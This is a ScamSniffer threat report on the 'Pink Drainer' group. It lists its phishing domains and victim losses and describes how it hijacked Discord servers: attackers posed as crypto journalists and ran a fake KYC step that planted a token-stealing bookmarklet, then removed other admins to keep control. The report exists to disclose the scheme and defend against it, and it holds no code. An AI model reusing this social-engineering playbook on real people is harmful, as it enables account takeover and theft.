Overview
Recently, there have been a large number of Discord and Twitter hacked events, including Evomos, Pika Protocol, OpenAI CTO, and Orbiter Finance.
Hackers send phishing links through Discord accounts they’ve gained access to. Many users have opened malicious websites in error and signed malicious signatures, resulting in the loss of their assets.
ScamSniffer has discovered that all of these hacking incidents are related to a group called Pink Drainer. Through deeper analysis, we found that almost all of the Discord hacks in the past month have been linked to them.
Through the analysis of stolen data on Mainnet, Arbitrum, BNB, Polygon, Optimism, and other chains, we found that the gang has stolen about $3 million in assets and has almost 1,932 victims!
Related Hacks
By analyzing the malicious websites created by Pink Drainer in the past month, we found that many Discord hacks are related to them. For example, Evomos, Starknet ID, LiFi, Cherry Network, Pika Protocol, Orbiter Finance, Flare Network, OpenAI CTO, etc.
| Brand | Date | Site | Source |
|---|---|---|---|
| Evmos | May 8 | evmos-claim.org | View |
| Starknet ID | May 11 | starknet.pm | View |
| LiFi | May 17 | lifi.pm | View |
| eth_ben quote tweet | May 26 | a0k1verse.club | View |
| Cherry Network | May 26 | cherry.pm | View |
| Pika Protocol | May 31 | pikaprotocol.pm | View |
| Orbiter Finance | June 1 | orbiter.pm | View |
| Flare Network | June 1 | flarenetwork.net | View |
| OpenAI CTO | June 2 | chatgpt.build | View |
Social Engineering Attacks
How did they manage to gain access to so many projects? Yes, it was through social engineering attacks. Based on interviews with some victims of Discord hacks, they were mostly caused by carefully crafted social engineering attacks that led to Discord token theft.
By impersonating journalists from well-known media outlets such as Decrypto and Cointelegraph and interviewing them. This process usually lasted for 1-3 days but ultimately required KYC authentication, which embedded phishing related to Discord in the final process.
For example, by guiding Discord administrators to open a malicious Carl verification bot and guiding them to add bookmarks containing malicious code.
“Drag Me” actually contains malicious JS code that can steal the user’s Discord Token.
If you follow these steps, the relevant Discord token will be stolen.
For more technical details, please refer to: How Scammer Used Malicious Bookmark to Gain Access to Discords of NFT Projects by SlowMist.
Lasting Longer
After successfully obtaining permissions, hackers will also take a series of measures to make the entire attack process last longer.
- Remove other administrators
- Set the malicious account as an administrator
- The main account conducts violations that lead to being blocked by Discord
And those steps will make it hard to delete these phishing messages from Discord Server and bring a larger impact.
Stolen Stats
By analyzing related data on multiple chains, a total of $3 million has been stolen so far, with about 1,932 victims.
There are $2.43 million on the Mainnet and $350k on Arbitrum.
Learn More: https://dune.com/scamsniffer/pinkdrainer-stats
Pink Drainer
Pink Drainer was first discovered by Taylor Monahan in ScamSniffer’s on-chain monitor bot.
The victim 0xf529127107c91bbf6c141304718491a437fb2f5f lost nearly $320,000 in NFTs such as Otherside Koda x 8, BoredApeYachtClub x 1, MutantApeYachtClub x 1, and Otherdeed x 11.
The address that transferred the victim’s assets was resolved pink-drainer.eth a few hours later, which is why we called Pink Drainer
About Scam Sniffer
Scam Sniffer is an anti-scam platform that combined off-chain and on-chain monitoring data to provide real-time anti-scam protection for web3 users.
We’ve helped well-known platforms protect their users and are committed to making web3 secure for the next billion users.